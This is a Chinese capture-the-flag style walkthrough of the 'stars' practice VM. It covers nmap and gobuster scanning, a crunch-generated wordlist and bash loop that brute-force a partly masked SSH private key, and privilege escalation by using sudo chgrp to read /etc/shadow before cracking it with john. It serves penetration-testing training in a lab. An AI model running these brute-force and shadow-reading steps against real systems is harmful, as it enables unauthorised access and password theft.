OSCP 靶场
靶场介绍
|
stars |
easy |
信息收集、id_rsa、crunch使用、cookie、shell 脚本编写、 |
信息收集
主机发现
nmap -sn 192.168.1.0/24
端口扫描
┌──(root㉿kali)-[~]
└─# nmap -sV -A -p- -T4 192.168.1.48
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-23 03:16 EST
Nmap scan report for 192.168.1.48
Host is up (0.00069s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 9e:f1:ed:84:cc:41:8c:7e:c6:92:a9:b4:29:57:bf:d1 (RSA)
| 256 9f:f3:93:db:72:ff:cd:4d:5f:09:3e:dc:13:36:49:23 (ECDSA)
|_ 256 e7:a3:72:dd:d5:af:e2:b5:77:50:ab:3d:27:12:0f:ea (ED25519)
80/tcp open http Apache httpd 2.4.51 ((Debian))
|_http-title: Cours PHP & MySQL
|_http-server-header: Apache/2.4.51 (Debian)
MAC Address: 08:00:27:8F:3A:01 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.69 ms 192.168.1.48目录扫描
└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.48 -x html,php,txt -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.48
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,php,txt
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.1.48/.html (Status: 403) [Size: 277]
http://192.168.1.48/index.php (Status: 200) [Size: 279]
http://192.168.1.48/.php (Status: 403) [Size: 277]
http://192.168.1.48/.html (Status: 403) [Size: 277]
http://192.168.1.48/.php (Status: 403) [Size: 277]
http://192.168.1.48/server-status (Status: 403) [Size: 277]
http://192.168.1.48/sshnote.txt (Status: 200) [Size: 117]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================
权限获取
一开始以为会是在目录下,遍历的半天。后面发现存在cookie 里面
这里有三个大写字母被*** 替换掉了。我们使用crunch 生成字典。
crunch 3 3 ABCDEFGHIJKLMNOPQRSTUVWXYZ > dict.txt
然后我们编写一个shell 脚本进行爆破登录
mv poisonedgift.txt id_rsa
mkdir keysdir#!/bin/bash
key=id_rsa
keys=keysdir
dict=dict.txt
for i in $(cat $dict); do
echo $i
sed "s/***/$i/" $key > $keys/$i.rsa
clear
done;
cd keysdir
chmod 600 *
for k in $(ls -1 *); do
echo $k
ssh -i $k [email protected] 2>/dev/null
clear
done;
权限提升
我们可以使用root权限执行chgrp文件,让chgrp变更文件或目录的所属群组,将/etc/shadow文件添加到sophie组里面。然后进行shadow 爆破。
john shadow --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt
End
“点赞、在看与分享都是莫大的支持”
原文始发于微信公众号(贝雷帽SEC):【OSCP】stars
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论